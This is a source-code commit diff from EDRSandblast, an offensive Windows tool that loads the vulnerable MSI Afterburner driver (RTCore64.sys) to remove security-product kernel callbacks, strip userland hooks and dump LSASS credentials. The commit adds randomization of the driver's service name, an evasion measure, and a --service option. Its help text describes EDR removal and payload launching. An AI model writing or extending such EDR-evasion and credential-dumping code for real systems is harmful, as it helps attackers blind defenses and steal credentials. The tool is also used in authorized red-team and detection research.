Adds randomization of service name

2026-06-08 16:37:12 +00:00 · 2021-11-10 01:12:48 +01:00
parent 4bff81986b
commit 9957b7a38e
7 changed files with 93 additions and 54 deletions
@@ -1689,15 +1689,16 @@ void OperateNotifyRoutines(DWORD64 NotifyRoutineAddress, struct FOUND_EDR_CALLBA
            }
        }
    }
+
    edrDrivers->index = edrDrivers->index + CurrentEDRDriversCount;
    if (CurrentEDRDriversCount == 0) {
        _tprintf(TEXT("[+] No EDR driver(s) found!\n"));
    }
    else if (remove) {
-        _tprintf(TEXT("[+] Removed a total of %i EDR driver(s)\n"), CurrentEDRDriversCount);
+        _tprintf(TEXT("[+] Removed a total of %i EDR / security products driver(s)\n"), CurrentEDRDriversCount);
    }
    else {
-        _tprintf(TEXT("[+] Found a total of %i EDR driver(s)\n"), CurrentEDRDriversCount);
+        _tprintf(TEXT("[+] Found a total of %i EDR / security products driver(s)\n"), CurrentEDRDriversCount);
    }

    CloseHandle(Device);
@@ -7,24 +7,24 @@
 #include <stdlib.h>
 #include <Psapi.h>
 #include <Tchar.h>
+#include <time.h>
 #include <tlhelp32.h>
 #include <malloc.h>
 #include <assert.h>

-#include "CredGuard.h"
-#include "DriverOps.h"
-#include "ETWThreatIntel.h"
-#include "FileVersion.h"
-#include "KernelCallbacks.h"
-#include "KernelMemoryPrimitives.h"
-#include "KernelPatternSearch.h"
-#include "LSASSDump.h"
-#include "NtoskrnlOffsets.h"
-#include "RunAsPPL.h"
-#include "WdigestOffsets.h"
-#include "UserlandHooks.h"
-
-#define SERVICE_NAME_LENGTH 8
+#include "Includes/Globals.h"
+#include "Includes/CredGuard.h"
+#include "Includes/DriverOps.h"
+#include "Includes/ETWThreatIntel.h"
+#include "Includes/FileVersion.h"
+#include "Includes/KernelCallbacks.h"
+#include "Includes/KernelMemoryPrimitives.h"
+#include "Includes/KernelPatternSearch.h"
+#include "Includes/LSASSDump.h"
+#include "Includes/NtoskrnlOffsets.h"
+#include "Includes/RunAsPPL.h"
+#include "Includes/WdigestOffsets.h"
+#include "Includes/UserlandHooks.h"

 typedef enum _START_MODE {
    dump,
@@ -6,27 +6,9 @@

 */

-static TCHAR* randString(TCHAR* str, size_t size)
-{
-    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789";
-    if (size) {
-        --size;
-        for (size_t n = 0; n < size; n++) {
-            int key = rand() % (int)(sizeof charset - 1);
-            str[n] = charset[key];
-        }
-        str[size] = '\0';
-    }
-    return str;
-}
-
-const TCHAR *gVulnDriverServiceName = TEXT("RTCore64");
-
-// TCHAR* gVulnDriverServiceName;
-
 int _tmain(int argc, TCHAR** argv) {
    // Parse command line arguments and initialize variables to default values if needed.
-    const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] <audit | dump | cmd | credguard> [--usermode [--unhook-method <N>]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver <RTCore64.sys>] [--nt-offsets <NtoskrnlOffsets.csv>] [--wdigest-offsets <WdigestOffsets.csv>] [-o | --dump-output <DUMP_FILE>]");
+    const TCHAR usage[] = TEXT("Usage: EDRSandblast.exe [-h | --help] [-v | --verbose] <audit | dump | cmd | credguard> [--usermode [--unhook-method <N>]] [--kernelmode] [--dont-unload-driver] [--dont-restore-callbacks] [--driver <RTCore64.sys>] [--service <SERVICE_NAME>] [--nt-offsets <NtoskrnlOffsets.csv>] [--wdigest-offsets <WdigestOffsets.csv>] [-o | --dump-output <DUMP_FILE>]");
    const TCHAR extendedUsage[] = TEXT("\n\
 -h | --help             Show this help message and exit.\n\
 -v | --verbose          Enable a more verbose output.\n\
@@ -56,8 +38,6 @@ Actions mode:\n\
 \t4               Loads an additional version of ntdll library into memory, and use the (hopefully\n\
 \t                unmonitored) version of NtProtectVirtualMemory present in this library to remove all\n\
 \t                present userland hooks.\n\
-\t5               Allocates a shellcode that uses a direct syscall to call NtProtectVirtualMemory,\n\
-\t                and uses it to remove all detected hooks\n\
 \n\
 Other options:\n\
 \n\
@@ -68,6 +48,7 @@ Other options:\n\
 \n\
 --driver <RTCore64.sys>                 Path to the Micro-Star MSI Afterburner vulnerable driver file.\n\
                                        Default to 'RTCore64.sys' in the current directory.\n\
+--service <SERVICE_NAME>                Name of the vulnerable service to intall / start.\n\
 \n\
 --nt-offsets <NtoskrnlOffsets.csv>      Path to the CSV file containing the required ntoskrnl.exe's offsets.\n\
                                        Default to 'NtoskrnlOffsets.csv' in the current directory.\n\
@@ -118,10 +99,6 @@ Other options:\n\
    BOOL ETWTIState = FALSE;
    hook* hooks = NULL;

-    /*
-    gVulnDriverServiceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR));
-    randString(gVulnDriverServiceName, SERVICE_NAME_LENGTH);
-    */

    for (int i = 2; i < argc; i++) {
        if (_tcsicmp(argv[i], TEXT("-h")) == 0 || _tcsicmp(argv[i], TEXT("--help")) == 0) {
@@ -152,6 +129,14 @@ Other options:\n\
            }
            _tcsncpy_s(driverPath, _countof(driverPath), argv[i], _tcslen(argv[i]));
        }
+        else if (_tcsicmp(argv[i], TEXT("--service")) == 0) {
+            i++;
+            if (i > argc) {
+                _tprintf(TEXT("%s"), usage);
+                return EXIT_FAILURE;
+            }
+            SetServiceName(argv[i], _tcslen(argv[i]) + 1);
+        }
        else if (_tcsicmp(argv[i], TEXT("--nt-offsets")) == 0) {
            i++;
            if (i > argc) {
@@ -242,7 +227,7 @@ Other options:\n\
        if (status != TRUE) {
            _tprintf(TEXT("[!] An error occurred while installing the vulnerable MSI Afterburner driver\n"));
            _tprintf(TEXT("[*] Uninstalling the service and attempting the install again...\n"));
-            Sleep(2000);
+            Sleep(20000);
            status = UninstallVulnerableDriver();
            Sleep(2000);
            status = status && InstallVulnerableDriver(driverPath);
@@ -377,7 +362,7 @@ Other options:\n\
            _tprintf(TEXT("\n\n"));
        }
        else {
-            _tprintf(TEXT("[+] Process is NOT \"safe\" to launch our payload, removing monitoring and start another process...\n"));
+            _tprintf(TEXT("[+] Process is NOT \"safe\" to launch our payload, removing monitoring and starting another process...\n"));
 #ifdef _DEBUG
            assert(kernelMode);
 #endif
@@ -436,12 +421,16 @@ Other options:\n\
            // Pass the same argument, only add the "--dont-unload-driver" flag as the vulnerable driver will still be needed by the parent process.
            TCHAR* currentCommandLine = GetCommandLine();
            TCHAR* noRemoveFlag = _tcsdup(TEXT(" --dont-unload-driver"));
+            TCHAR* serviceNameOpt = _tcsdup(TEXT(" --service "));
+            TCHAR* svcName = GetServiceName();

            //TODO: fix length calculation. _tcslen returns the length that should be used, but error due to "no const".
            const SIZE_T commandLineMaxLen = 32768;
-            TCHAR* commandLine = (TCHAR*)calloc(commandLineMaxLen, sizeof(TCHAR));
+            TCHAR* commandLine = (TCHAR*) calloc(commandLineMaxLen, sizeof(TCHAR));
            _tcsncat_s(commandLine, commandLineMaxLen, currentCommandLine, _tcslen(currentCommandLine));
            _tcsncat_s(commandLine, commandLineMaxLen, noRemoveFlag, _tcslen(noRemoveFlag));
+            _tcsncat_s(commandLine, commandLineMaxLen, serviceNameOpt, _tcslen(serviceNameOpt));
+            _tcsncat_s(commandLine, commandLineMaxLen, svcName, _tcslen(svcName));

            if (CreateProcess(argv[0], commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
                WaitForSingleObject(pi.hProcess, INFINITE);
@@ -503,7 +492,7 @@ Other options:\n\
        status = UninstallVulnerableDriver();
        if (status == FALSE) {
            _tprintf(TEXT("[!] An error occured while attempting to uninstall the vulnerable driver\n"));
-            _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), gVulnDriverServiceName);
+            _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), serviceName);
            lpExitCode = EXIT_FAILURE;
        }
        else {
@@ -18,9 +18,13 @@
 #define PRINT_ERROR_AUTO(func) (_tprintf(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError()))
 #endif

+#define SERVICE_NAME_LENGTH 8
 #define MAX_UNINSTALL_ATTEMPTS 3
 #define OP_SLEEP_TIME 1000

+TCHAR* GetServiceName(void);
+void SetServiceName(TCHAR* newName, size_t szNewName);
+
 BOOL InstallVulnerableDriver(TCHAR* driverPath);

-BOOL UninstallVulnerableDriver();
+BOOL UninstallVulnerableDriver(void);
@@ -1,3 +1,9 @@
 #pragma once

-const TCHAR *gVulnDriverServiceName;
+extern union NtoskrnlOffsets ntoskrnlOffsets;
+
+extern union WdigestOffsets wdigestOffsets;
+
+//extern TCHAR* serviceName;
+
+extern TCHAR* serviceName;
@@ -42,6 +42,7 @@ BOOL ServiceAddEveryoneAccess(SC_HANDLE serviceHandle) {
 }

 DWORD ServiceInstall(PCTSTR serviceName, PCTSTR displayName, PCTSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt) {
+    BOOL status = FALSE;
    SC_HANDLE hSC = NULL, hS = NULL;

    hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE);
@@ -177,10 +178,49 @@ BOOL ServiceUninstall(PCTSTR serviceName, DWORD attemptCount) {

 */

+static TCHAR* randString(TCHAR* str, size_t size) {
+    srand(time(0));
+
+    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789";
+    if (size) {
+        for (size_t n = 0; n < size; n++) {
+            int key = rand() % (int)(sizeof charset - 1);
+            str[n] = charset[key];
+        }
+        str[size] = '\0';
+    }
+    return str;
+}
+
+TCHAR* serviceName;
+TCHAR* GetServiceName(void) {
+    if (!serviceName || _tcslen(serviceName) == 0) {
+        serviceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR));
+        randString(serviceName, SERVICE_NAME_LENGTH);
+    }
+    return serviceName;
+}
+
+void SetServiceName(TCHAR *newName, size_t szNewName) {
+    if (serviceName) {
+        free(serviceName);
+    }
+    serviceName = (TCHAR*) calloc(szNewName, sizeof(TCHAR));
+
+    if (!serviceName) {
+        _tprintf(TEXT("[!] Error while attempting to set the service name.\n"));
+        return;
+    }
+
+    _tcscpy_s(serviceName, szNewName, newName);
+}
+
 BOOL InstallVulnerableDriver(TCHAR* driverPath) {
+
+    TCHAR* svcName = GetServiceName();
    const TCHAR svcDesc[] = TEXT("");

-    DWORD status = ServiceInstall(gVulnDriverServiceName, svcDesc, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
+    DWORD status = ServiceInstall(serviceName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);

    if (status == 0x00000005) {
        _tprintf(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?\n"));
@@ -189,8 +229,10 @@ BOOL InstallVulnerableDriver(TCHAR* driverPath) {
    return status == 0x0;
 }

-BOOL UninstallVulnerableDriver() {
-    BOOL status = ServiceUninstall(gVulnDriverServiceName, 0);
+BOOL UninstallVulnerableDriver(void) {
+    TCHAR* svcName = GetServiceName();
+
+    BOOL status = ServiceUninstall(svcName, 0);
    
    if (!status) {
        PRINT_ERROR_AUTO(TEXT("ServiceUninstall"));
@@ -150,10 +150,7 @@ TCHAR* FindDriver(DWORD64 address, BOOL verbose) {
 }

 HANDLE GetDriverHandle() {
-    TCHAR service[MAX_PATH] = { 0 };
-    TCHAR suffix[] = TEXT("\\\\.\\");
-    _tcsncat_s(service, _countof(service), suffix, _countof(suffix));
-    _tcsncat_s(service, _countof(service), gVulnDriverServiceName, _tcslen(gVulnDriverServiceName));
+    TCHAR service[] = TEXT("\\\\.\\RTCore64");
    HANDLE Device = CreateFile(service, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
        
    if (Device == INVALID_HANDLE_VALUE) {